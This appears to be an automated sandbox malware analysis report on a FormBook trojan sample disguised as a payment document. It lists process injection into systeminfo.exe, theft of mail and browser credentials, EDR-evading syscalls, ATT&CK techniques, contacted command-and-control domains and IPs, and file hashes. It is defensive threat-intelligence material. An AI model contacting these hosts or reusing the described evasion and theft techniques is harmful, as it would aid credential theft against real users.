                Source: Yara match | File source: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4150364860.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4148377228.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2064136057.00000000021E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 114 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
Behavior Graph ID: 1545186
Sample: Payment&WarantyBonds.bat
Startdate: 30/10/2024
Architecture: WINDOWS
Score: 100

• DNS/IP: www.xipowerplay.xyz
• DNS/IP: www.091210.xyz
  • Signature: Performs DNS queries to domains with low reputation
• DNS/IP: 17 other IPs or domains
• Signature: Suricata IDS alerts for network traffic
• Signature: Multi AV Scanner detection for submitted file
• Signature: Yara detected FormBook
• Signature: 5 other signatures
• Process: Payment&WarantyBonds.exe 3 (started)
  • Dropped file: C:\Users\...\Payment&WarantyBonds.exe.log, ASCII
  • Signature: Injects a PE file into a foreign processes
  • Process: Payment&WarantyBonds.exe (started)
    • Signature: Maps a DLL or memory area into another process
    • Process: oDnyHukDVUZk.exe (injected)
      • Signature: Found direct / indirect Syscall (likely to bypass EDR)
      • Process: systeminfo.exe 13 (started)
        • Signature: Tries to steal Mail credentials (via file / registry access)
        • Signature: Tries to harvest and steal browser information (history, passwords, etc)
        • Signature: Modifies the context of a thread in another process (thread injection)
        • Signature: 3 other signatures
        • Process: oDnyHukDVUZk.exe (injected)
          • DNS/IP: www.cotti.club 103.120.80.111, 49794, 49810, 49826 WEST263GO-HKWest263InternationalLimitedHK Hong Kong
          • DNS/IP: www.simplek.top 203.161.49.193, 50036, 50037, 50038 VNPT-AS-VNVNPTCorpVN Malaysia
          • DNS/IP: 12 other IPs or domains
          • Signature: Found direct / indirect Syscall (likely to bypass EDR)
        • Process: firefox.exe (started)

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| Payment&WarantyBonds.exe | 24% | ReversingLabs | Win32.Trojan.Sonbokli | |
| Payment&WarantyBonds.exe | 100% | Joe Sandbox ML | | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.urwpp.deDPleasePayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.zhongyicts.com.cnPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensasysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://www.sakkal.comPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wesysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_campsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://www.extrime1.shopoDnyHukDVUZk.exe, 00000008.00000002.4150364860.0000000004AD4000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://www.strato.deoDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002D48000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://www.apache.org/licenses/LICENSE-2.0Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://www.fontbureau.comPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://piensasolutions.com/imgs/parking/icon-ssl-parking.pngsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://www.west.cn/services/webhosting/systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?ZT=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpsysteminfo.exe, 00000007.00000002.4149067807.000000000628A000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000003B6A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://plus.google.com/u/0/102310483732773374239systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://www.west.cn/services/domain/systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://www.ecosia.org/newtab/systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://piensasolutions.com/imgs/parking/icon-hosting.pngsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://piensasolutions.com/imgs/parking/icon-web.pngsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://www.carterandcone.comlPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://ac.ecosia.org/autocomplete?q=systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://www.fontbureau.com/designers/cabarga.htmlNPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaignsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://www.founder.com.cn/cnPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.fontbureau.com/designers/frere-user.htmlPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=domsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hostsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://piensasolutions.com/imgs/parking/icon-parking.pngsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://www.west.cn/jiaoyi/systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.jiyu-kobo.co.jp/Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://piensasolutions.com/imgs/parking/icon-facebook-small.pngsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.fontbureau.com/designers8Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://piensasolutions.com/imgs/parking/icon-twitter-small.pngsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://twitter.com/piensasolutionssysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://piensasolutions.com/imgs/parking/icon-web-sencilla.pngsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                              unknown
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545186
Start date and time: 2024-10-30 08:08:48 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Payment&WarantyBonds.exe (renamed file extension from bat to exe)
Original Sample Name: Payment&WarantyBonds.bat
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@18/14
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 99
• Number of non-executed functions: 219
Cookbook Comments:
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• VT rate limit hit for: Payment&WarantyBonds.exe
Time      Type             Description
03:09:46  API Interceptor  1x Sleep call for process: Payment&WarantyBonds.exe modified
03:10:55  API Interceptor  8702789x Sleep call for process: systeminfo.exe modified
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              Orden de compra.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              W6Z9uSRsKQ.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 20.57.7.175
                                                                                                                                                                              wZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 51.125.244.193
                                                                                                                                                                              Transferencia.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.107.253.45
                                                                                                                                                                              SuNMTBkfPo.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 104.46.238.240
                                                                                                                                                                              8v2IShmMos.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 40.106.170.125
                                                                                                                                                                              Orden de Compra No. 434565344657.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              B6eg13TpEH.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 51.153.54.236
                                                                                                                                                                              No context
                                                                                                                                                                              No context
                                                                                                                                                                              Process:C:\Users\user\Desktop\Payment&WarantyBonds.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                              Process:C:\Windows\SysWOW64\systeminfo.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Entropy (8bit):7.950809546708747
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                              File name:Payment&WarantyBonds.exe
                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                              MD5:a9da1b42f6ad80ee6085f69e6c25f49b
                                                                                                                                                                              SHA1:e7f51c3eb496a278999fd893e1fcfca8a685f854
                                                                                                                                                                              SHA256:4e6fe41b2158546ebc7d5dcfe13aa832e3ce5025b36e0cfcc9d7f373e1a0a089
                                                                                                                                                                              SHA512:da5a50aee37e977f3af7bd7af90d91245d42197978d9a8b016558989d6999a1448d44095b61b164fa7a2f7374b338e29cf0efe3be40a125f782930898dca8162
                                                                                                                                                                              SSDEEP:12288:H8aDPw1Qk89Tmyij4kIqGNlSq8UMb7SmUdiJEYqXmSEwILV4C4BWpDatCEftp2uF:HdLw9gTFsOqGHFqvUwJEYJSEp4C44pDa
                                                                                                                                                                              TLSH:5DF4238273EE4711D47E6BF52EA2164453B66749092BF66C4FAC00CC6FA6B004D5AF1B
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!g..............0.................. ........@.. ....................................@................................
                                                                                                                                                                              Icon Hash:4bd4d4d4d4d6d629
                                                                                                                                                                              Entrypoint:0x4bafda
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x6721A484 [Wed Oct 30 03:14:12 2024 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:4
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                              Instruction
                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbaf88 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xbc000 | 0x1720 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbe000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xb8fe0 | 0xb9000 | 2681d2cd27ec28f4bdba76764ce7023e | False | 0.9540500950168919 | data | 7.95788200827039 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xbc000 | 0x1720 | 0x1800 | 7fcbb9d7315293f588ab54c4c8fbedf4 | False | 0.7862955729166666 | data | 6.9286601127334855 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xbe000 | 0xc | 0x200 | 2e0b8e9b6825d01448eab31c2eb3e274 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

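| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
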